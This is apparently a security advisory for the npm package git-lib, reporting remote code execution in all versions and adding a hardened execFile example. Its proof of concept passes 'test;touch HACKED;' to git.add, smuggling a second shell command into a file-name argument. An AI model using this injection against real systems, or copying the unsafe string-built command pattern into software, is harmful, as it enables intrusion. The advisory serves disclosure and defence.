Remote Code Execution (RCE)

Affecting git-lib package, ALL versions


Overview

git-lib is a library that provides various git commands.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). User input is formatted into a command string that is then executed without any validation.

PoC by mik317

  • Create the following PoC file:
// poc.js
var git = require("git-lib");

git.add("test;touch HACKED;").then(function(){
    /** successfully added **/
}).catch(function(err){
    /** unsuccessful **/
});
  • Check that no file called HACKED exists
  • Execute the following commands in another terminal:
npm i git-lib # Install affected module
git init # Avoid problems with *git*
node poc.js #  Run the PoC
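
The pattern described in the Overview, next to a hardened form, as an added example that is not git-lib's code and not part of the original advisory. The helper names (unsafeAddCommand, safeAddArgs, argvSeenByChild) are hypothetical, and a child Node process stands in for git so the example runs offline.

```javascript
const { execFileSync } = require("child_process");

// Unsafe pattern (hypothetical helper): the input is pasted into one string.
// Handed to exec(), a shell would parse ';' in it as a command separator.
function unsafeAddCommand(file) {
  return "git add " + file;
}

// Hardened pattern (hypothetical helper): validate, then build an argv array
// for execFile(), which starts the program directly with no shell involved.
function safeAddArgs(file) {
  if (typeof file !== "string" || file.length === 0) {
    throw new TypeError("file must be a non-empty string");
  }
  if (file.includes("\0")) {
    throw new Error("NUL byte in path");
  }
  // "--" ends option parsing, so a value such as "-A" is treated as a path.
  return ["add", "--", file];
}

// Assumption: a child Node process stands in for git so this runs offline.
// It reports the arguments it received, exactly as git would receive them.
function argvSeenByChild(args) {
  const script =
    "console.log(JSON.stringify(process.argv.slice(-" + args.length + ")))";
  const out = execFileSync(process.execPath, ["-e", script, "--", ...args], {
    encoding: "utf8",
  });
  return JSON.parse(out);
}

const payload = "test;touch HACKED;"; // the input used in the PoC above
console.log("shell string:", unsafeAddCommand(payload));
console.log("argv via execFile:", argvSeenByChild(safeAddArgs(payload)));
```

With the argv form the whole input arrives as a single path argument, so git would report an unknown pathspec and no second command runs.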

CVSS Score

6.4
medium severity
  • Attack Vector
    Local
  • Attack Complexity
    High
  • Privileges Required
    High
  • User Interaction
    None
  • Scope
    Unchanged
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H/E:P/RC:C
Credit: mik317
CWE: CWE-94
Snyk ID: SNYK-JS-GITLIB-1012734
Disclosed: 24 Sep, 2020
Published: 25 Sep, 2020